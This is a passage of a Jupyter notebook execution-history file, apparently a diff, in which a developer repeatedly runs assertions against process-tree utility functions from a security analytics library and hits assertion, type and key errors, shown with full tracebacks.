+        "\u001b[1;32m<ipython-input-57-4119399dbf15>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m     20\u001b[0m \u001b[0mchildren2\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m     21\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren2\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 22\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren2\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m+\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m     23\u001b[0m assert ptutil.get_summary_info(p_tree) == {\n\u001b[0;32m     24\u001b[0m     \u001b[1;34m'Processes'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m1010\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mAssertionError\u001b[0m: "
+       ]
+      }
+     ],
+     "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8",
+     "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True)) + 1\nassert ptutil.get_summary_info(p_tree) == {\n    'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:06:13.458Z"
+   },
+   {
+    "cell": {
+     "executionCount": 58,
+     "executionEventId": "ec24dbec-5184-4865-a87d-34565a57de04",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "12"
+       },
+       "execution_count": 58,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "len(children2)"
+    },
+    "executionTime": "2019-12-13T21:06:28.533Z"
+   },
+   {
+    "cell": {
+     "executionCount": 59,
+     "executionEventId": "99ef027f-a356-46ea-aa83-5410dd92ab9c",
+     "hasError": true,
+     "id": "5610ff3a-83b0-4253-92bb-feba160df533",
+     "outputs": [
+      {
+       "ename": "TypeError",
+       "evalue": "bad operand type for unary ~: 'str'",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mTypeError\u001b[0m                                 Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-59-2d81e090e831>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m     20\u001b[0m \u001b[0mchildren2\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m     21\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren2\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 22\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren2\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m+\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m     23\u001b[0m assert ptutil.get_summary_info(p_tree) == {\n\u001b[0;32m     24\u001b[0m     \u001b[1;34m'Processes'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m1010\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32me:\\src\\microsoft\\msticpy\\msticpy\\msticpy\\sectools\\process_tree_utils.py\u001b[0m in \u001b[0;36mget_siblings\u001b[1;34m(procs, source, include_source)\u001b[0m\n\u001b[0;32m    770\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    771\u001b[0m     \u001b[0mParameters\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 772\u001b[1;33m     \u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    773\u001b[0m     \u001b[0mprocs\u001b[0m \u001b[1;33m:\u001b[0m \u001b[0mpd\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mDataFrame\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    774\u001b[0m         \u001b[0mProcess\u001b[0m \u001b[0mevents\u001b[0m \u001b[1;33m(\u001b[0m\u001b[1;32mwith\u001b[0m \u001b[0mprocess\u001b[0m \u001b[0mtree\u001b[0m \u001b[0mmetadata\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__invert__\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m   1539\u001b[0m     \u001b[1;32mdef\u001b[0m \u001b[0m__invert__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1540\u001b[0m         \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1541\u001b[1;33m             \u001b[0marr\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0moperator\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minv\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mcom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mvalues_from_object\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   1542\u001b[0m             \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__array_wrap__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0marr\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1543\u001b[0m         \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mTypeError\u001b[0m: bad operand type for unary ~: 'str'"
+       ]
+      }
+     ],
+     "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8",
+     "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=False)) + 1\nassert ptutil.get_summary_info(p_tree) == {\n    'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:06:34.554Z"
+   },
+   {
+    "cell": {
+     "executionCount": 60,
+     "executionEventId": "c3953220-a1de-418b-acc9-ba1fa355f5f7",
+     "hasError": true,
+     "id": "5610ff3a-83b0-4253-92bb-feba160df533",
+     "outputs": [
+      {
+       "ename": "TypeError",
+       "evalue": "bad operand type for unary ~: 'str'",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mTypeError\u001b[0m                                 Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-60-bed42a8ae093>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m     20\u001b[0m \u001b[0mchildren2\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m     21\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren2\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 22\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren2\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m+\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m     23\u001b[0m assert ptutil.get_summary_info(p_tree) == {\n\u001b[0;32m     24\u001b[0m     \u001b[1;34m'Processes'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m1010\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32me:\\src\\microsoft\\msticpy\\msticpy\\msticpy\\sectools\\process_tree_utils.py\u001b[0m in \u001b[0;36mget_siblings\u001b[1;34m(procs, source, include_source)\u001b[0m\n\u001b[0;32m    770\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    771\u001b[0m     \u001b[0mParameters\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 772\u001b[1;33m     \u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    773\u001b[0m     \u001b[0mprocs\u001b[0m \u001b[1;33m:\u001b[0m \u001b[0mpd\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mDataFrame\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    774\u001b[0m         \u001b[0mProcess\u001b[0m \u001b[0mevents\u001b[0m \u001b[1;33m(\u001b[0m\u001b[1;32mwith\u001b[0m \u001b[0mprocess\u001b[0m \u001b[0mtree\u001b[0m \u001b[0mmetadata\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__invert__\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m   1539\u001b[0m     \u001b[1;32mdef\u001b[0m \u001b[0m__invert__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1540\u001b[0m         \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1541\u001b[1;33m             \u001b[0marr\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0moperator\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minv\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mcom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mvalues_from_object\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   1542\u001b[0m             \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__array_wrap__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0marr\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1543\u001b[0m         \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mTypeError\u001b[0m: bad operand type for unary ~: 'str'"
+       ]
+      }
+     ],
+     "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8",
+     "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree) == {\n    'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:06:57.495Z"
+   },
+   {
+    "cell": {
+     "executionCount": 61,
+     "executionEventId": "191494c1-7b0c-4891-944b-313d60a35ba2",
+     "hasError": true,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "ename": "TypeError",
+       "evalue": "bad operand type for unary ~: 'str'",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mTypeError\u001b[0m                                 Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-61-3ef15652036f>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;32me:\\src\\microsoft\\msticpy\\msticpy\\msticpy\\sectools\\process_tree_utils.py\u001b[0m in \u001b[0;36mget_siblings\u001b[1;34m(procs, source, include_source)\u001b[0m\n\u001b[0;32m    770\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    771\u001b[0m     \u001b[0mParameters\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 772\u001b[1;33m     \u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    773\u001b[0m     \u001b[0mprocs\u001b[0m \u001b[1;33m:\u001b[0m \u001b[0mpd\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mDataFrame\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    774\u001b[0m         \u001b[0mProcess\u001b[0m \u001b[0mevents\u001b[0m \u001b[1;33m(\u001b[0m\u001b[1;32mwith\u001b[0m \u001b[0mprocess\u001b[0m \u001b[0mtree\u001b[0m \u001b[0mmetadata\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__invert__\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m   1539\u001b[0m     \u001b[1;32mdef\u001b[0m \u001b[0m__invert__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1540\u001b[0m         \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1541\u001b[1;33m             \u001b[0marr\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0moperator\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minv\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mcom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mvalues_from_object\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   1542\u001b[0m             \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__array_wrap__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0marr\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1543\u001b[0m         \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mTypeError\u001b[0m: bad operand type for unary ~: 'str'"
+       ]
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_siblings(p_tree, children2.iloc[0], include_source=False)"
+    },
+    "executionTime": "2019-12-13T21:07:23.383Z"
+   },
+   {
+    "cell": {
+     "executionCount": 62,
+     "executionEventId": "a6c8e692-1f62-48bc-997d-4b514613da0f",
+     "hasError": true,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "ename": "KeyError",
+       "evalue": "'parent_key'",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mKeyError\u001b[0m                                  Traceback (most recent call last)",
